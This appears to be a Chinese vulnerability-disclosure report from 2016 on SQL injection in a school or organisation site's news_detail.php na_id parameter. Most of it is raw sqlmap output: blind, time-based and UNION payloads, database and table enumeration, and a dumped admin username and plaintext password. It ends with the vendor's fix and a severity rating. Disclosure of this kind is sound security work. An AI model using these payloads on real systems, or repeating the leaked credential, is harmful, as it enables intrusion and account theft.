2016-02-16: 细节已通知厂商并且等待厂商处理中 2016-02-17: 厂商已经确认,细节仅向厂商公开 2016-02-27: 细节向核心白帽子及相关领域专家公开 2016-03-01: 厂商已经修复漏洞并主动公开,细节向公众公开
1,2,1
http://**.**.**.**/news_detail.php?type=news&na_id=2295na_id参数存在sql注入
sqlmap identified the following injection points with a total of 4030 HTTP(s) requests:---Parameter: na_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=news&na_id=2295 AND 6977=6977 Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: type=news&na_id=(SELECT (CASE WHEN (5901=5901) THEN SLEEP(5) ELSE 5901*(SELECT 5901 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: type=news&na_id=-9555 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6b71,0x7565555a424852634673,0x717a787171)-- Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY]-- ---web server operating system: Linux SuSE 11.1web application technology: PHP 5.2.6, Apache 2.2.10back-end DBMS: MySQL 5.0.12current user: 'spc@localhost'current database: 'spc'current user is DBA: Falseavailable databases [2]:[*] information_schema[*] spcsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: na_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=news&na_id=2295 AND 6977=6977 Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: type=news&na_id=(SELECT (CASE WHEN (5901=5901) THEN SLEEP(5) ELSE 5901*(SELECT 5901 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: type=news&na_id=-9555 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6b71,0x7565555a424852634673,0x717a787171)-- Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY]-- ---web server operating system: Linux SuSE 11.1web application technology: PHP 5.2.6, Apache 2.2.10back-end DBMS: MySQL 5.0.12Database: spc[30 tables]+---------------+| user || album || archievement || background || banner || banner2 || class || class_subject || content || main_banner || menu || na || na_attachment || news || photo || principal_msg || product || sa || sa_album || sa_committee || sa_news || sa_photo || staff || staff_title || style || sub_menu || subject || system_page || title || user_page |+---------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: na_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=news&na_id=2295 AND 6977=6977 Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: type=news&na_id=(SELECT (CASE WHEN (5901=5901) THEN SLEEP(5) ELSE 5901*(SELECT 5901 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: type=news&na_id=-9555 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6b71,0x7565555a424852634673,0x717a787171)-- Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY]-- ---web server operating system: Linux SuSE 11.1web application technology: PHP 5.2.6, Apache 2.2.10back-end DBMS: MySQL 5.0.12Database: spcTable: user[4 columns]+----------+-------------+| Column | Type |+----------+-------------+| id | int(11) || password | varchar(40) || status | varchar(5) || username | varchar(40) |+----------+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: na_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=news&na_id=2295 AND 6977=6977 Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: type=news&na_id=(SELECT (CASE WHEN (5901=5901) THEN SLEEP(5) ELSE 5901*(SELECT 5901 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: type=news&na_id=-9555 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6b71,0x7565555a424852634673,0x717a787171)-- Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY]-- ---web server operating system: Linux SuSE 11.1web application technology: PHP 5.2.6, Apache 2.2.10back-end DBMS: MySQL 5.0.12Database: spcTable: user[1 entry]+----------+----------+| username | password |+----------+----------+| admin | s3p2c@!! |+----------+----------+
参数化查询过滤
危害等级:高
漏洞Rank:10
确认时间:2016-02-17 16:05
已將事件通知有關機構
2016-03-01:相關機構回報已修復漏洞